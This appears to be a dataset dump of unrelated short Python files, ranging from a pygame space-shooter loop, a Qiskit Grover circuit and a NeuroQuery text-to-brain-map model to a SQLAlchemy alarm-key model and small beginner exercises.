def update(self):
self.rect.y -= 5
if self.rect.bottom < 0:
self.kill()
if pygame.sprite.spritecollide(self, alien_group, True):
self.kill()
explosion_fx.play()
explosion = Explosion(self.rect.centerx, self.rect.centery, 2)
explosion_group.add(explosion)
# create aliens class
class Aliens(pygame.sprite.Sprite):
def __init__(self, x, y):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load(
"img/alien" + str(random.randint(1, 5)) + ".png")
self.rect = self.image.get_rect()
self.rect.center = [x, y]
self.move_counter = 0
self.move_direction = 1
def update(self):
self.rect.x += self.move_direction
self.move_counter += 1
if abs(self.move_counter) > 75:
self.move_direction *= -1
self.move_counter *= self.move_direction
# create Alien Bullets class
class Alien_Bullets(pygame.sprite.Sprite):
def __init__(self, x, y):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("img/alien_bullet.png")
self.rect = self.image.get_rect()
self.rect.center = [x, y]
def update(self):
self.rect.y += 2
if self.rect.top > screen_height:
self.kill()
if pygame.sprite.spritecollide(self, spaceship_group, False, pygame.sprite.collide_mask):
self.kill()
explosion2_fx.play()
# reduce player health
spaceship.health_remaining -= 1
explosion = Explosion(self.rect.centerx, self.rect.centery, 1)
explosion_group.add(explosion)
# create explosion class
class Explosion(pygame.sprite.Sprite):
def __init__(self, x, y, size):
pygame.sprite.Sprite.__init__(self)
self.images = []
for num in range(1, 6):
img = pygame.image.load(f"img/exp{num}.png")
if size == 1:
img = pygame.transform.scale(img, (20, 20))
if size == 2:
img = pygame.transform.scale(img, (40, 40))
if size == 3:
img = pygame.transform.scale(img, (160, 160))
# add img to the list
self.images.append(img)
self.index = 0
self.image = self.images[self.index]
self.rect = self.image.get_rect()
self.rect.center = [x, y]
self.counter = 0
def update(self):
explosion_speed = 3
# update explosion animation
self.counter += 1
if self.counter >= explosion_speed and self.index < len(self.images) - 1:
self.counter = 0
self.index += 1
self.image = self.images[self.index]
# if animation is complete, delete explosion
if self.index >= len(self.images) - 1 and self.counter >= explosion_speed:
self.kill()
# create sprite groups
spaceship_group = pygame.sprite.Group()
bullet_group = pygame.sprite.Group()
alien_group = pygame.sprite.Group()
alien_bullet_group = pygame.sprite.Group()
explosion_group = pygame.sprite.Group()
def create_aliens():
# generate aliens
for row in range(rows):
for item in range(cols):
alien = Aliens(100 + item * 100, 100 + row * 70)
alien_group.add(alien)
create_aliens()
# create player
spaceship = Spaceship(screen_width // 2, screen_height - 100, 3)
spaceship_group.add(spaceship)
run = True
while run:
clock.tick(fps)
# draw background
draw_bg()
if countdown == 0:
# create random alien bullets
# record current time
time_now = pygame.time.get_ticks()
# shoot
if time_now - last_alien_shot > alien_cooldown and len(alien_bullet_group) < 5 and len(alien_group) > 0:
attacking_alien = random.choice(alien_group.sprites())
alien_bullet = Alien_Bullets(
attacking_alien.rect.centerx, attacking_alien.rect.bottom)
alien_bullet_group.add(alien_bullet)
last_alien_shot = time_now
# check if all aliens have been destroyed
if len(alien_group) == 0:
game_over = 1
if game_over == 0:
# update spaceship
game_over = spaceship.update()
# update sprite groups
bullet_group.update()
alien_group.update()
alien_bullet_group.update()
else:
if game_over == -1:
draw_text('YOU LOST, ACK!!!', font40, white, int(
screen_width / 2 - 110), int(screen_height / 2 + 50))
if game_over == 1:
draw_text('YOU WIN!!!', font40, white, int(
screen_width / 2 - 110), int(screen_height / 2 + 50))
if countdown > 0:
draw_text('GET READY!', font40, white, int(
screen_width / 2 - 110), int(screen_height / 2 + 50))
draw_text(str(countdown), font40, white, int(
screen_width / 2 - 10), int(screen_height / 2 + 100))
count_timer = pygame.time.get_ticks()
if count_timer - last_count > 1000:
countdown -= 1
last_count = count_timer
# update explosion group
explosion_group.update()
# draw sprite groups
spaceship_group.draw(screen)
bullet_group.draw(screen)
alien_group.draw(screen)
alien_bullet_group.draw(screen)
explosion_group.draw(screen)
# event handlers
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
pygame.display.update()
pygame.quit()
| nilq/baby-python | python |
if __name__ == '__main__':
n = int(input())
numbers = [None]*(n+1)
a = list(map(int,input().split()))
for i in a:
numbers[i] = True
for i in range(1,n+1):
if numbers[i] is None:
print(i) | nilq/baby-python | python |
import zmq
import uuid
from random import randint
from common.settings import *
context = zmq.Context()
servers = SERVERS_LOCAL
connections = []
for i in xrange(N_SERVERS):
socket = context.socket(zmq.REQ)
socket.connect("tcp://" + servers[i]["client2server"])
connections.append(socket)
for i in range(600):
rand_server = randint(0, len(connections) - 1)
socket = connections[rand_server]
socket.send_json({
"type" : "spawn",
"player_id" : uuid.uuid4().hex,
"player_type" : "h"
})
response = socket.recv()
for socket in connections:
socket.close() | nilq/baby-python | python |
#!/usr/bin/env python
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import numpy as np
plt.rcParams.update({'font.size': 16})
dt = 0.02
dims = 201, 201
x = range(-100, 101)
for i in range(0,1100, 100):
input_file = 'tsunami_h_' + '%4.4i' % i + '.dat'
print('Plotting ' + input_file)
field = np.reshape(np.fromfile(input_file, dtype='float32'), dims)
ticks = np.arange(-0.1, 0.11, 0.01)
field[field > 0.0999] = 0.0999
field[field <-0.0999] =-0.0999
fig = plt.figure(figsize=(8, 7))
ax = fig.add_subplot(111, aspect='equal')
cnt = plt.contourf(x, x, field, ticks, cmap=cm.Spectral)
for c in cnt.collections:
c.set_edgecolor('face')
plt.colorbar(shrink=0.8)
plt.xlabel('Distance [m]')
plt.ylabel('Distance [m]')
plt.title('Water height @ time = ' + '%3.1f' % (i * dt) + ' s')
plt.savefig(input_file[:-2] + '.png')
#plt.savefig(input_file[:-2] + '.svg')
plt.close(fig)
| nilq/baby-python | python |
import filecmp
import os.path
class dircmp(filecmp.dircmp):
"""
Compare the content of dir1 and dir2. In contrast with filecmp.dircmp, this
subclass compares the content of files with the same path.
"""
def phase3(self):
"""
Find out differences between common files.
Ensure we are using content comparison with shallow=False.
"""
fcomp = filecmp.cmpfiles(self.left, self.right, self.common_files,
shallow=False)
self.same_files, self.diff_files, self.funny_files = fcomp
def is_same(dir1, dir2):
"""
Compare two directory trees content.
Return False if they differ, True is they are the same.
"""
compared = dircmp(dir1, dir2)
if (compared.left_only or compared.right_only or compared.diff_files
or compared.funny_files):
return False
for subdir in compared.common_dirs:
if not is_same(os.path.join(dir1, subdir), os.path.join(dir2, subdir)):
return False
return True | nilq/baby-python | python |
wrf_dir="/home/WRFV4.1.3/run_tutorial/"
wrf_input_file="wrfinput_d01"
wrf_bdy_file="wrfbdy_d01"
wrf_met_dir="/home/WPSV4.1.3/run_tutorial/"
wrf_met_files="met_em.d01.2010*"
mera_dir="/home/Merra2_data/"
mera_files="svc_MERRA2_300.inst3_3d_aer_Nv.2010*"
do_IC=True
do_BC=True
###########################################
#GOCART DUST ONLY
spc_map = [ 'DUST_1 -> 1.0*[DU001];1.e9',
'DUST_2 -> 1.0*[DU002];1.e9',
'DUST_3 -> 1.0*[DU003];1.e9',
'DUST_4 -> 1.0*[DU004];1.e9',
'DUST_5 -> 1.0*[DU005];1.e9']
#GOCART FULL
spc_map = [ 'DUST_1 -> 1.0*[DU001];1.e9',
'DUST_2 -> 1.0*[DU002];1.e9',
'DUST_3 -> 1.0*[DU003];1.e9',
'DUST_4 -> 1.0*[DU004];1.e9',
'DUST_5 -> 1.0*[DU005];1.e9',
'SEAS_1 -> 1.0*[SS002];1.e9',
'SEAS_2 -> 1.0*[SS003];1.e9',
'SEAS_3 -> 1.0*[SS004];1.e9',
'SEAS_4 -> 1.0*[SS005];1.e9',
'so2 -> 0.453*[SO2];1.e6',
'sulf -> 0.302*[SO4];1.e6',
'BC1 -> 1.0*[BCPHOBIC];1.e9',
'BC2 -> 1.0*[BCPHILIC];1.e9',
'OC1 -> 1.0*[OCPHOBIC];1.e9',
'OC2 -> 1.0*[OCPHILIC];1.e9',
'dms -> 0.467*[DMS];1.e6']
#,'msa -> 0.302*[MSA];1.e6'
spc_map = [ 'o3 -> 0.604*[O3];1.e6','co -> 1.0*[CO];1.e6']
#spc_map = [ 'so2 -> 0.453*[SO2];1.e6','sulf -> 0.302*[SO4];1.e6']
###########################################
#CBMZ-MOSAIC_8bins SO2, Sulf, O3, CO, DUST and Sea salt (NaCl).
#oc_a0X,bc_a0X still need to be done
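# NOTE: each spc_map assignment in this file overwrites the previous one,
# so only the last definition below takes effect.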
spc_map =['so2 -> 0.453*[SO2];1.e6',
'o3 -> 0.604*[O3];1.e6',
'co -> 1.0*[CO];1.e6',
'oin_a01->0.01292*[DU001];1.e9',
'oin_a02->0.03876*[DU001];1.e9',
'oin_a03->0.19382*[DU001];1.e9',
'oin_a04->0.30103*[DU001];1.e9',
'oin_a05->0.30103*[DU001];1.e9',
'oin_a06->0.20412*[DU001]+0.37963*[DU002];1.e9',
'oin_a07->0.62037*[DU002]+0.64308*[DU003];1.e9',
'oin_a08->0.35692*[DU003]+0.73697*[DU004];1.e9',
'na_a01->0.086245*[SS001];1.e9',
'na_a02->0.226471*[SS001];1.e9',
'na_a03->0.080656*[SS001]+0.109080*[SS002];1.e9',
'na_a04->0.169416*[SS002];1.e9',
'na_a05->0.114876*[SS002]+0.079899*[SS003];1.e9',
'na_a06->0.248190*[SS003];1.e9',
'na_a07->0.065283*[SS003]+0.166901*[SS004];1.e9',
'na_a08->0.226471*[SS004]+0.000000*[SS005];1.e9',
'cl_a01->0.133000*[SS001];1.e9',
'cl_a02->0.349246*[SS001];1.e9',
'cl_a03->0.124382*[SS001]+0.168214*[SS002];1.e9',
'cl_a04->0.261260*[SS002];1.e9',
'cl_a05->0.177153*[SS002]+0.123215*[SS003];1.e9',
'cl_a06->0.382739*[SS003];1.e9',
'cl_a07->0.100674*[SS003]+0.257382*[SS004];1.e9',
'cl_a08->0.349246*[SS004]+0.000000*[SS005];1.e9',
'so4_a01->0.057541*[SO4];1.e9',
'so4_a02->0.116135*[SO4];1.e9',
'so4_a03->0.264759*[SO4];1.e9',
'so4_a04->0.246169*[SO4];1.e9',
'so4_a05->0.091116*[SO4];1.e9',
'so4_a06->0.013328*[SO4];1.e9',
'so4_a07->0.000762*[SO4];1.e9',
'so4_a08->0.000017*[SO4];1.e9',
'num_a01->5.855e+16*[DU001]+1.147e+18*[SS001]+3.621e+17*[SO4];1',
'num_a02->2.196e+16*[DU001]+3.766e+17*[SS001]+9.136e+16*[SO4];1',
'num_a03->1.372e+16*[DU001]+1.676e+16*[SS001]+2.267e+16*[SS002]+2.604e+16*[SO4];1',
'num_a04->2.664e+15*[DU001]+4.401e+15*[SS002]+3.026e+15*[SO4];1',
'num_a05->3.330e+14*[DU001]+3.731e+14*[SS002]+2.595e+14*[SS003]+1.400e+14*[SO4];1',
'num_a06->2.663e+13*[DU001]+4.953e+13*[DU002]+1.008e+14*[SS003]+2.560e+12*[SO4];1',
'num_a07->1.012e+13*[DU002]+1.049e+13*[DU003]+3.313e+12*[SS003]+8.469e+12*[SS004]+1.829e+10*[SO4];1',
'num_a08->7.276e+11*[DU003]+1.502e+12*[DU004]+1.436e+12*[SS004]+1.599e-03*[SS005]+5.048e+07*[SO4];1']
| nilq/baby-python | python |
import pathlib
import numpy as np
from scipy import sparse
import pandas as pd
from sklearn.preprocessing import normalize
from sklearn.utils.extmath import safe_sparse_dot
from nilearn import image
from neuroquery.img_utils import get_masker
from neuroquery import tokenization, smoothed_regression, ridge
_MAX_SIMILAR_DOCS_RETURNED = 100
class NeuroQueryModel:
"""Text -> brain map encoder.
It encodes text into statistical maps of the brain and also provides a list
of related terms.
It can be initialized with a fitted regression model
(`neuroquery.smoothed_regression.SmoothedRegression`) or loaded using
`from_data_dir`. Most users will probably load a pre-trained model with
`from_data_dir`.
Parameters
----------
vectorizer : `neuroquery.tokenization.TextVectorizer`
An object that transforms text into TFIDF features.
smoothed_regression : `neuroquery.smoothed_regression.SmoothedRegression`
A reduced-rank regression that combines feature smoothing, projection,
and linear regression. The input features must correspond to the
outputs of `vectorizer`.
mask_img : Nifti1Image
Mask of the regression targets. The non-zero voxels correspond to the
dependent variables.
corpus_info : dict, optional (default=None)
Data required to report which studies are most relevant for a query.
Must contain:
- "metadata": pandas DataFrame, each row describing a study
- "tfidf": scipy sparse matrix or numpy array, TFIDF features for
the documents. Rows must correspond to the same studies as in
"metadata", and columns to the terms in the vectorizer's
vocabulary.
If corpus_info is not available the model will not report most similar
studies.
"""
@classmethod
def from_data_dir(cls, model_dir):
"""Load a pre-trained TextToBrain model.
Parameters
----------
model_dir : str
path to a directory containing the serialized trained model.
The directory must be organized as the one returned by
`neuroquery.datasets.fetch_neuroquery_model`, except that
`corpus_metadata.csv` and `corpus_tfidf.npz` are optional.
"""
model_dir = pathlib.Path(model_dir)
vectorizer = tokenization.TextVectorizer.from_vocabulary_file(
str(model_dir / "vocabulary.csv"),
voc_mapping="auto",
add_unigrams=False,
)
regression = smoothed_regression.SmoothedRegression.from_data_dir(
str(model_dir)
)
mask_img = image.load_img(str(model_dir / "mask_img.nii.gz"))
corpus_tfidf = model_dir / "corpus_tfidf.npz"
corpus_metadata = model_dir / "corpus_metadata.csv"
if corpus_tfidf.is_file() and corpus_metadata.is_file():
corpus_info = {}
corpus_info["tfidf"] = sparse.load_npz(str(corpus_tfidf))
corpus_info["metadata"] = pd.read_csv(
str(corpus_metadata), encoding="utf-8"
)
else:
corpus_info = None
return cls(vectorizer, regression, mask_img, corpus_info=corpus_info)
def to_data_dir(self, model_dir):
"""Save the model so it can later be loaded with `from_data_dir`."""
model_dir = pathlib.Path(model_dir)
model_dir.mkdir(parents=True, exist_ok=True)
self.vectorizer.to_vocabulary_file(str(model_dir / "vocabulary.csv"))
self.smoothed_regression.to_data_dir(model_dir)
self.get_masker().mask_img_.to_filename(
str(model_dir / "mask_img.nii.gz")
)
if self.corpus_info is not None:
sparse.save_npz(
str(model_dir / "corpus_tfidf.npz"),
sparse.csr_matrix(self.corpus_info["tfidf"]),
)
self.corpus_info["metadata"].to_csv(
str(model_dir / "corpus_metadata.csv"), index=False
)
def __init__(
self, vectorizer, smoothed_regression, mask_img, corpus_info=None
):
self.vectorizer = vectorizer
self.smoothed_regression = smoothed_regression
self.mask_img = mask_img
self.corpus_info = corpus_info
def full_vocabulary(self):
"""All the terms recognized by the model."""
return self.vectorizer.get_vocabulary()
def _supervised_features(self):
if not hasattr(
self.smoothed_regression.regression_, "selected_features_"
):
return np.arange(
self.smoothed_regression.regression_.coef_.shape[1]
)
return self.smoothed_regression.regression_.selected_features_
def supervised_vocabulary(self):
"""Terms selected as features for the supervised regression."""
return np.asarray(self.full_vocabulary())[self._supervised_features()]
def document_frequencies(self):
if self.corpus_info is None:
return None
if not hasattr(self, "document_frequencies_"):
document_frequencies = (self.corpus_info["tfidf"] > 0).sum(axis=0)
document_frequencies = np.asarray(document_frequencies).ravel()
self.document_frequencies_ = pd.Series(
document_frequencies, index=self.full_vocabulary()
)
return self.document_frequencies_
def _similar_words(self, tfidf, vocabulary=None):
if vocabulary is None:
vocabulary = self.full_vocabulary()
if sparse.issparse(tfidf):
tfidf = tfidf.A.squeeze()
similar = pd.Series(tfidf, index=vocabulary).sort_values(
ascending=False
)
return similar[similar > 0]
def similar_documents(self, tfidf):
if self.corpus_info is None:
return None
similarities = safe_sparse_dot(
tfidf, self.corpus_info["tfidf"].T, dense_output=True
).ravel()
order = np.argsort(similarities)[::-1]
order = order[similarities[order] > 0][:_MAX_SIMILAR_DOCS_RETURNED]
ordered_simil = similarities[order]
similar_docs = (
self.corpus_info["metadata"].iloc[order].reset_index(drop=True)
)
similar_docs["similarity"] = ordered_simil
return similar_docs
def _beta_norms(self):
return np.linalg.norm(
self.smoothed_regression.regression_.coef_, axis=0
)
def get_masker(self):
if not hasattr(self, "masker_"):
self.masker_ = get_masker(self.mask_img)
return self.masker_
def _supervised_vocabulary_set(self):
if not hasattr(self, "supervised_vocabulary_set_"):
self.supervised_vocabulary_set_ = set(self.supervised_vocabulary())
return self.supervised_vocabulary_set_
def transform(self, documents):
"""Transform a set of documents
Parameters
----------
documents : list or array of str
the text snippets to transform
Returns
-------
list of dict, each containing:
- "brain_map": a nifti image of the most relevant brain regions.
- "raw_tfidf": the vectorized documents.
- "smoothed_tfidf": the tfidf after semantic smoothing.
- "z_map" is an alias for "brain_map" for backwards compatibility
"""
raw_tfidf = self.vectorizer.transform(documents)
raw_tfidf = normalize(raw_tfidf, copy=False)
self.smoothed_regression.regression_.intercept_ = 0.0
brain_maps = self.smoothed_regression.transform_to_brain_maps(
raw_tfidf
)
masker = self.get_masker()
brain_maps_unmasked = list(map(masker.inverse_transform, brain_maps))
smoothed_tfidf = self.smoothed_regression.smoothing_.transform(
raw_tfidf
)
smoothed_tfidf = normalize(smoothed_tfidf, copy=False)
return {
"brain_map": brain_maps_unmasked,
"z_map": brain_maps_unmasked,
"raw_tfidf": raw_tfidf,
"smoothed_tfidf": smoothed_tfidf,
}
def __call__(self, document):
"""Transform a document
Parameters
----------
document : str
the text to transform
Returns
-------
dict containing:
- "brain_map": a nifti image of the most relevant brain regions.
- "similar_words": pandas DataFrame containing related terms.
- "similarity" is how much the term is related.
- "weight_in_brain_map" is the contribution of the term in the
predicted "brain_map".
- "weight_in_query" is the TFIDF of the term in `document`.
- "similar_documents": if no corpus_info was provided, this is
`None`. Otherwise it is a DataFrame containing information about
the most relevant studies.
- "highlighted_text": an XML document showing which terms were
recognized in the provided text.
- "smoothed_tfidf": the tfidf after semantic smoothing.
- "raw_tfidf": the vectorized documents.
- "z_map" is an alias for "brain_map" for backwards compatibility
"""
self.vectorizer.tokenizer.keep_pos = True
result = self.transform([document])
result = {k: v[0] for k, v in result.items()}
similar_words = pd.DataFrame(
{
"similarity": self._similar_words(result["smoothed_tfidf"]),
"weight_in_query": self._similar_words(result["raw_tfidf"]),
"weight_in_brain_map": self._similar_words(
result["smoothed_tfidf"][self._supervised_features()]
* self._beta_norms(),
self.supervised_vocabulary(),
),
},
columns=["similarity", "weight_in_brain_map", "weight_in_query"],
)
similar_words.fillna(0.0, inplace=True)
similar_words.sort_values(
by="weight_in_brain_map", ascending=False, inplace=True
)
doc_freq = self.document_frequencies()
if doc_freq is not None:
similar_words["n_documents"] = doc_freq.loc[similar_words.index]
similar_words = similar_words.loc[
:,
[
"similarity",
"weight_in_brain_map",
"weight_in_query",
"n_documents",
],
]
result["similar_words"] = similar_words
result["similar_documents"] = self.similar_documents(
result["smoothed_tfidf"]
)
self._supervised_vocabulary_set()
result[
"highlighted_text"
] = self.vectorizer.tokenizer.highlighted_text(
lambda w: {
"in_model": (
"true" if w in self.supervised_vocabulary_set_ else "false"
)
}
)
return result
class SimpleEncoder:
"""Basic text to brain map encoder"""
@classmethod
def from_data_dir(cls, model_dir):
model_dir = pathlib.Path(model_dir)
vectorizer = tokenization.TextVectorizer.from_vocabulary_file(
str(model_dir / "vocabulary.csv"),
voc_mapping="auto",
add_unigrams=False,
)
regression = ridge.FittedLinearModel.from_data_dir(model_dir)
mask_img = image.load_img(str(model_dir / "mask_img.nii.gz"))
return cls(vectorizer, regression, mask_img)
def to_data_dir(self, model_dir):
"""Save the model so it can later be loaded with `from_data_dir`."""
model_dir = pathlib.Path(model_dir)
model_dir.mkdir(parents=True, exist_ok=True)
self.vectorizer.to_vocabulary_file(str(model_dir / "vocabulary.csv"))
self.regression.to_data_dir(model_dir)
self.get_masker().mask_img_.to_filename(
str(model_dir / "mask_img.nii.gz")
)
def __init__(self, vectorizer, regression, mask_img):
self.vectorizer = vectorizer
self.regression = regression
self.mask_img = mask_img
def get_masker(self):
if not hasattr(self, "masker_"):
self.masker_ = get_masker(self.mask_img)
return self.masker_
def __call__(self, document):
self.vectorizer.tokenizer.keep_pos = True
self.regression.intercept_ = 0.0
result = {}
tfidf = self.vectorizer.transform([document])
masked_map = self.regression.predict(tfidf).squeeze()
result["brain_map"] = self.get_masker().inverse_transform(masked_map)
result[
"highlighted_text"
] = self.vectorizer.tokenizer.highlighted_text()
return result
def full_vocabulary(self):
"""All the terms recognized by the model."""
return self.vectorizer.get_vocabulary()
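# Usage sketch (assumes a pre-trained model directory such as the one
# returned by neuroquery.datasets.fetch_neuroquery_model()):
# encoder = NeuroQueryModel.from_data_dir("neuroquery_model")
# result = encoder("language comprehension in the temporal lobe")
# result["brain_map"]       # Nifti1Image of predicted activations
# result["similar_words"]   # DataFrame of related terms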
| nilq/baby-python | python |
def dutch(arr):
low = 0
mid = 0
high = len(arr) - 1
while mid <= high:
if arr[mid] == 0:
arr[low], arr[mid] = arr[mid], arr[low]
low += 1
mid += 1
elif arr[mid] == 1:
mid += 1
else:
arr[mid], arr[high] = arr[high], arr[mid]
high -= 1
arr = [1,0,2,1,0,2,1,2,1,2,1,1,0,2,1,0,1,2,1,2,1,1,2,1,0,2,1,1]
print(arr)
dutch(arr)
print(arr)
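# Dutch national flag partition: a single pass with three pointers,
# O(n) time and O(1) extra space.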
| nilq/baby-python | python |
# find a specific element of a list
import numpy as np
import matplotlib.pyplot as plt
from qiskit import QuantumCircuit, transpile
from qiskit.providers.aer import QasmSimulator
from qiskit.visualization import plot_histogram
# Use Aer's qasm_simulator
simulator = QasmSimulator()
# Create a oracle operator
oracle = QuantumCircuit(2, name='oracle')
oracle.cz(0,1) #flips sign of winning state, (specific to |11> being the winning state)
oracle.to_gate() #makes oracle its own gate
# create reflection operator
reflection = QuantumCircuit(2, name='reflection')
# take our superposition state back to \ell-0 state
reflection.h([0,1])
# apply negative phase only to 00 state
reflection.z([0,1])
reflection.cz(0,1)
# transform back to superpos state
reflection.h([0,1])
reflection.to_gate() # turns reflection into a gate
# create circuit that flips winning answer: |11>
grover_circ = QuantumCircuit(2,2)
# apply H gate to all qubits
grover_circ.h([0,1]) #prepares superposition state
grover_circ.append(oracle,[0,1]) # add on oracle
grover_circ.append(reflection,[0,1]) # add on reflection
grover_circ.measure([0,1],[0,1]) # measure
# compile the circuit down to low-level QASM instructions
# supported by the backend (not needed for simple circuits)
compiled_circuit = transpile(grover_circ, simulator)
# Execute the circuit on the qasm simulator
job = simulator.run(compiled_circuit, shots=1)
# Grab results from the job
result = job.result()
# Returns counts
counts = result.get_counts(grover_circ)
print(counts)
# Draw the circuit (with matplotlib)
grover_circ.draw(output='mpl')
plt.show()
# Plot a histogram
#plot_histogram(counts)
#plt.show() | nilq/baby-python | python |
import re
regex = r"\*\*(?P<bold>\S+)\*\*|\*(?P<italic>\S+)\*|==(?P<wrap>\S+)==|\[(?P<url>\S+\]\(\S+)\)"
p = re.compile(regex, re.MULTILINE)
func_dict = {
'wrap': lambda x: (f"<mark>{x}</mark>", f"=={x}=="),
'bold': lambda x: (f"<b>{x}</b>", f"**{x}**"),
'italic': lambda x: (f"<i>{x}</i>", f"*{x}*"),
'url': lambda x: ("<a href='{1}' target='_blank'>{0}</a>".format(*x.split('](')), f"[{x})"),
}
def format_string(test_str: str) -> str:
matches = list(p.finditer(test_str))
for match in matches:
for key, item in match.groupdict().items():
if item:
x, y = func_dict[key](item)
return format_string(test_str.replace(y, x))
return test_str
def form_str(string: str) -> str:
"""
    Format a string according to markdown
    - string with tags separated by spaces
    - tags can be combined
    - italic
    - bold
    - marker wrap
    - a tag
"""
return format_string(string.replace(' ', '|')).replace('|', ' ')
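# Example:
# form_str('**bold** and *italic*')  # -> '<b>bold</b> and <i>italic</i>'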
| nilq/baby-python | python |
import numpy as np
import math
import rospy
from tf.transformations import quaternion_from_euler, euler_from_quaternion
from geometry_msgs.msg import Quaternion
from geometry_msgs.msg import Point, PoseArray
from visualization_msgs.msg import Marker
from visualization_msgs.msg import MarkerArray
from ackermann_msgs.msg import AckermannDriveStamped
from angles import *
num_waypoints = 5
waypoint_tol = 0.1
retrace_waypoint_tol = 0.15
wheelbase = 1.9
ODOM_INF = "/ground_truth/state" | nilq/baby-python | python |
from sqlalchemy.orm.collections import attribute_mapped_collection
from emonitor.extensions import db
from emonitor.modules.alarmkeys.alarmkeycar import AlarmkeyCars
from emonitor.modules.alarmkeys.alarmkeyset import AlarmkeySet
class Alarmkey(db.Model):
"""Alarmkey class"""
__tablename__ = 'alarmkeys'
__table_args__ = {'extend_existing': True}
id = db.Column(db.Integer, primary_key=True)
category = db.Column(db.String(40), default='')
key = db.Column(db.String(40), default='')
key_internal = db.Column(db.String(40), default='')
_keyset = db.Column('keyset', db.ForeignKey('alarmkeysets.id'))
keyset = db.relationship("AlarmkeySet", collection_class=attribute_mapped_collection('id'))
keysetitem = db.Column(db.INTEGER, default=0)
remark = db.Column(db.Text)
def __init__(self, category, key, key_internal, remark, keyset=None, keysetitem=None):
self.category = category
self.key = key
self.key_internal = key_internal
self.remark = remark
self._keyset = keyset
self.keysetitem = keysetitem
def _getCars(self, cartype, department):
"""
Prototype method for car or material lists
:param cartype: 1|2|3: cars1, cars2, material as integer
:param department: id of department as integer
:return: list of cars, material
"""
alarmcars = AlarmkeyCars.getAlarmkeyCars(kid=self.id or 9999, dept=department)
if not alarmcars:
# try default
alarmcars = AlarmkeyCars.getAlarmkeyCars(kid=9999, dept=department)
if alarmcars:
if cartype == 1:
return alarmcars.cars1
elif cartype == 2:
return alarmcars.cars2
elif cartype == 3:
return alarmcars.materials
else:
return []
def setCars(self, department, **kwargs):
"""
Set carlist of department
:param department: id of department as integer
:param kwargs:
- *cars1*: list of :py:class:`emonitor.modules.cars.car.Car` objects for cars1
- *cars2*: list of :py:class:`emonitor.modules.cars.car.Car` objects for cars2
- *material*: list of :py:class:`emonitor.modules.cars.car.Car` objects for material
"""
alarmcars = AlarmkeyCars.getAlarmkeyCars(kid=self.id, dept=department)
if not alarmcars:
alarmcars = AlarmkeyCars(self.id, department, '', '', '')
db.session.add(alarmcars)
if "cars1" in kwargs.keys():
alarmcars._cars1 = kwargs['cars1']
if "cars2" in kwargs.keys():
alarmcars._cars2 = kwargs['cars2']
if "material" in kwargs.keys():
alarmcars._material = kwargs['material']
def getCars1(self, department):
"""
Get list of Car objects for cars1 of current alarmkey definition of given department
:param department: id of department as integer
:return: list of :py:class:`emonitor.modules.cars.car.Car` objects
"""
return self._getCars(1, department)
def getCars2(self, department):
"""
Get list of Car objects for cars2 of current alarmkey definition of given department
:param department: id of department as integer
:return: list of :py:class:`emonitor.modules.cars.car.Car` objects
"""
return self._getCars(2, department)
def getMaterial(self, department):
"""
Get list of Car objects for material of current alarmkey definition of given department
:param department: id of department as integer
:return: list of :py:class:`emonitor.modules.cars.car.Car` objects
"""
return self._getCars(3, department)
def hasDefinition(self, department):
"""
        Check whether no car definition exists yet for the current alarmkey
        and the given department
        :param department: id of department
        :return: True if no definition exists, else False
"""
return AlarmkeyCars.getAlarmkeyCars(kid=self.id or 9999, dept=department) is None
@staticmethod
def getAlarmkeys(id='', keysetid=None):
"""
Get all alarmkey definitions or single definition with given 'id'
:param id: id of alarmkey
:param keysetid: id of :py:class:`emonitor.modules.alarmkeys.AlarmkeySet` oder *None*
:return: list of defintions or single definition
"""
if id not in ['', 'None']:
return Alarmkey.query.filter_by(id=id).first()
elif keysetid:
if int(keysetid) == 0: # deliver all un-matched items
return Alarmkey.query.filter_by(_keyset=None).order_by('category').all()
return Alarmkey.query.filter_by(_keyset=keysetid).order_by('category').all()
else:
keyset = AlarmkeySet.getCurrentKeySet()
if keyset is None:
return Alarmkey.query.order_by('category').all()
else:
return Alarmkey.query.filter_by(_keyset=keyset.id).order_by('category').all()
@staticmethod
def getOrphanKeys():
"""
Get list of all orphan alarmkeys
:return: list of orphan alarmkeys
"""
return Alarmkey.query.filter_by(keyset=None).all()
@staticmethod
def getAlarmkeysByName(name):
"""
        Get Alarmkey objects whose key matches the given name
        :param name: name as string (like)
        :return: list of :py:class:`emonitor.modules.alarmkeys.alarmkey.Alarmkey` objects
"""
return Alarmkey.query.filter(Alarmkey.key.like('%' + name + '%')).all()
@staticmethod
def getAlarmkeysByCategory(category):
"""
Get all alarmkey definitions of given category
:param category: category as string
:return: :py:class:`emonitor.modules.alarmkeys.alarmkey.Alarmkey` object list
"""
return Alarmkey.query.filter_by(category=category).all()
@staticmethod
def getAlarmkeysByCategoryId(categoryid, keysetid=None):
"""
Get all alarmkey definitions of given category id
:param categoryid: category as string
:param keysetid: keysetid as integer, 0 for un-matched, None for all
:return: :py:class:`emonitor.modules.alarmkeys.alarmkey.Alarmkey` object list
"""
key = Alarmkey.query.filter_by(id=categoryid).one()
if keysetid is None:
return Alarmkey.query.filter_by(category=key.category).all()
elif int(keysetid) == 0:
return Alarmkey.query.filter_by(category=key.category, _keyset=None).all()
else:
return Alarmkey.query.filter(Alarmkey.category == key.category and Alarmkey._keyset == keysetid).all()
@staticmethod
def getAlarmkeysDict():
"""
Get dict of all alarmkeys with alarmkey.id as dict key
:return: dict of alarmkeys
"""
return dict(db.get(Alarmkey.id, Alarmkey).order_by(Alarmkey.key).all())
@staticmethod
def getDefault(department):
"""
Get default alarmkey definition of given department
:param department: id as integer
:return: :py:class:`emonitor.modules.alarmkeys.alarmkey.Alarmkey` object
"""
return AlarmkeyCars.query.filter_by(kid=9999, dept=department).first() or AlarmkeyCars(9999, department, '', '', '')
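# Usage sketch (inside an emonitor app/request context; ids assumed):
# key = Alarmkey.getAlarmkeys(id=1)
# cars = key.getCars1(department=1)  # Car objects for cars1 of department 1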
| nilq/baby-python | python |
n1 = float(input('Grade 1: '))
n2 = float(input('Grade 2: '))
m = (n1 + n2) / 2
if m < 5:
    print('FAILED :(')
elif m < 7:
    print('MAKE-UP EXAM...')
else:
    print('PASSED!! :D')
| nilq/baby-python | python |
'''
prompt = "If you tell us who you are, we can personalize the messages you see"
prompt += "\nWhat is your first name: "
name = input(prompt)
print("\nHello, " + name + "!\n")
age = int(input("how old are you? "))
print(age, end="\n\n")
height = float(input("How tall are you, in meters? "))
if height >= 1.50:
print("\nYou're tall enough to ride!\n")
else:
